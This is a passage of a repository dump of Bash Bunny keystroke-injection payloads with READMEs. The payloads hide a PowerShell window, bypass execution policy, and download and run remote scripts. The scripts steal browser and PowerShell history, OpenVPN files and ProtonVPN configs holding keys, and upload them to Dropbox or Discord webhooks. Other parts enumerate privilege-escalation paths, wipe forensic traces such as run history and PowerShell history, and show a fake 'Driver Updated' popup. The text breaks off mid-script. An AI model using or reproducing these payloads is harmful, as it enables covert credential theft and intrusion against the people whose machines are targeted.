    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# History-Pig\n\nA payload to exfiltrate the history of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/History-Pig/payload.txt",
    "content": "REM     Title: History-Pig\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate browsers history to a dropbox\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "BashBunny/payloads/OVPN-Hog/o.ps1",
    "content": "function OVPN-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n        'username' = $env:username\n        'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Drive = \"C:\"\n\n$Files = Get-ChildItem -Path $Drive -Filter \"*.ovpn\" -File -Recurse\n\nif ($Files) {\n    $types = @{\n        \"*.ovpn\" = \"OpenVPN\"\n    }\n\n    foreach ($type in $types.Keys) {\n        $filteredFiles = $Files | Where-Object { $_.Name -like $type }\n\n        if ($filteredFiles) {\n            $zipFile = Join-Path -Path $env:TEMP -ChildPath \"$($types[$type]).zip\"\n\n            $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n            OVPN-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n        }\n    }\n}\n"
  },
  {
    "path": "BashBunny/payloads/OVPN-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files looking for \".ovpn\" files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\n\r\nREM     Target: Windows 10\r\nQUACK DELAY 2000\r\nQUACK GUI r\r\nQUACK DELAY 500\r\nQUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl\r\nQUACK ENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "BashBunny/payloads/OVPN-Hog/readme.md",
    "content": "<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#Getting-Started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# OVPN-Hog\r\n\r\nA PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).\r\n\r\n## Description\r\n\r\nThis script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\n\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "BashBunny/payloads/Powershell-History/PH.ps1",
    "content": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Powershell History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Powershell History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt\"\r\n     Copy-Item \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "BashBunny/payloads/Powershell-History/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Powershell-History\n\nA payload to exfiltrate the history of the powershell console\n\n## Description\n\nThis payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Powershell-History/payload.txt",
    "content": "REM     Title: Powershell-History\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "BashBunny/payloads/Printer-Recon/PR.ps1",
    "content": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nfunction Clean-Exfil { \n\n# empty temp folder\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Empty recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\n$F1 = \"$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt\"\n\nGet-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1\n\nDropBox-Upload -f $F1\n\nClean-Exfil\n\n\n\n\n\n"
  },
  {
    "path": "BashBunny/payloads/Printer-Recon/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nThis payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Printer-Recon/payload.txt",
    "content": "REM     Title: Printer-Recon\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "BashBunny/payloads/Priv-Paths/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nA payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\n\n## Getting Started\n\n### Dependencies\n\n* Discord Webhook or other service that uses webhooks\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc\n```\nwmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Priv-Paths/payload.txt",
    "content": "REM     Title: Priv-Paths\r\nREM     Author: atomiczsec\r\nREM     Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\r\nREM     Target: Windows 10\r\n\r\n\r\nQ DELAY 3000\r\nQ GUI r \r\nQ DELAY 1000\r\nQ STRING cmd \r\nQ ENTER\r\nQ DELAY 500\r\nQ STRING cd %HOMEPATH%\r\nQ ENTER\r\nQ DELAY 1000\r\nQ STRING wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\r\nQ ENTER\r\nQ DELAY 1000\r\nQ STRING curl.exe -F \"payload_json={\\\"username\\\": \\\"p\\\", \\\"content\\\": \\\"**Paths**\\\"}\" -F \"file=@p.txt\" YOUR-DISCORD-WEBHOOK\r\nQ ENTER\r\nQ DELAY 200\r\nQ STRING del p.txt\r\nQ ENTER\r\nQ DELAY 100\r\nQ STRING exit\r\nQ ENTER"
  },
  {
    "path": "BashBunny/payloads/Proton-Hog/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Proton-Hog\n\nA payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\n\n## Description\n\nThis payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file\n\nThen dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "BashBunny/payloads/Proton-Hog/payload.txt",
    "content": "REM     Title: Proton-Hog\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "BashBunny/payloads/Proton-Hog/s.ps1",
    "content": "function DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\n# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored\r\n\r\nif (-not(Test-Path \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\")) {\r\n     try {\r\n         Write-Host \"The VPN folder has not been found. \"\r\n     }\r\n     catch {\r\n         throw 